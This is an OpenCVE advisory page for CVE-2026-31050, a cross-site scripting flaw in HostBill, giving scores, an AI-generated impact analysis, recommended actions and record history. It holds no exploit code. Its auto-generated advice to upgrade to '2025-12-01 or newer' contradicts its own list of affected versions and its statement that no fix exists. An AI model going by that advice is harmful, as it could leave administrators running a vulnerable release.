Description
Cross Site Scripting vulnerability in Hostbill v.2025-11-24 and 2025-12-01 allows a remote attacker to execute arbitrary code
Published: 2026-04-24
Score: 4.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Remote Code Execution
Action: Immediate Patch
AI Analysis

Impact

HostBill v.2025-11-24 and 2025-12-01 contain a cross‑site scripting (XSS) flaw that permits a remote attacker to run arbitrary code. The vulnerability arises when untrusted input is reflected or stored in the application’s admin and client interfaces without proper sanitization, allowing a malicious payload to be delivered to an affected user. Executing such payloads can grant the attacker unauthorized control over the victim’s browser session and potentially the underlying system if the code runs with higher privileges.

Affected Systems

The affected systems are HostBill web applications deployed with the 2025‑11‑24 or 2025‑12‑01 releases. Admin or client users who view pages that incorporate legacy or unsanitized input may be able to trigger the XSS vector.

Risk and Exploitability

The CVSS score of 4.9 indicates moderate overall risk, while the EPSS score of less than 1% suggests a low likelihood of active exploitation at present. The vulnerability is not listed in the CISA KEV catalog. Based on the description, the likely attack vector is a web‑based exploitation where an attacker crafts a malicious script and induces vulnerable users to view a page that contains the payload. Because the flaw can lead to arbitrary code execution, the potential impact on confidentiality, integrity, and availability is significant for any compromised user session.

Generated by OpenCVE AI on April 28, 2026 at 07:10 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the latest HostBill release (e.g., 2025‑12‑01 or newer) that eliminates the XSS flaw.
  • Ensure that any legacy or custom modules no longer rely on the affected interfaces and remove or sandbox them.
  • Restrict execution of user‑provided code by configuring proper Content Security Policy (CSP) headers and enabling output encoding throughout the application.

Generated by OpenCVE AI on April 28, 2026 at 07:10 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 28 Apr 2026 07:30:00 +0000

Type Values Removed Values Added
Title Cross‑Site Scripting in HostBill Enables Remote Code Execution

Mon, 27 Apr 2026 19:30:00 +0000

Type Values Removed Values Added
First Time appeared Hostbillapp
Hostbillapp hostbill
Vendors & Products Hostbillapp
Hostbillapp hostbill

Fri, 24 Apr 2026 16:15:00 +0000

Type Values Removed Values Added
Weaknesses CWE-79
Metrics cvssV3_1

{'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 24 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Description Cross Site Scripting vulnerability in Hostbill v.2025-11-24 and 2025-12-01 allows a remote attacker to execute arbitrary code
References

Subscriptions

Hostbillapp Hostbill
cve-icon MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-04-24T15:22:54.550Z

Reserved: 2026-03-09T00:00:00.000Z

Link: CVE-2026-31050

cve-icon Vulnrichment

Updated: 2026-04-24T15:10:13.756Z

cve-icon NVD

Status : Deferred

Published: 2026-04-24T15:16:26.980

Modified: 2026-04-24T17:55:55.317

Link: CVE-2026-31050

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-28T07:15:19Z

Weaknesses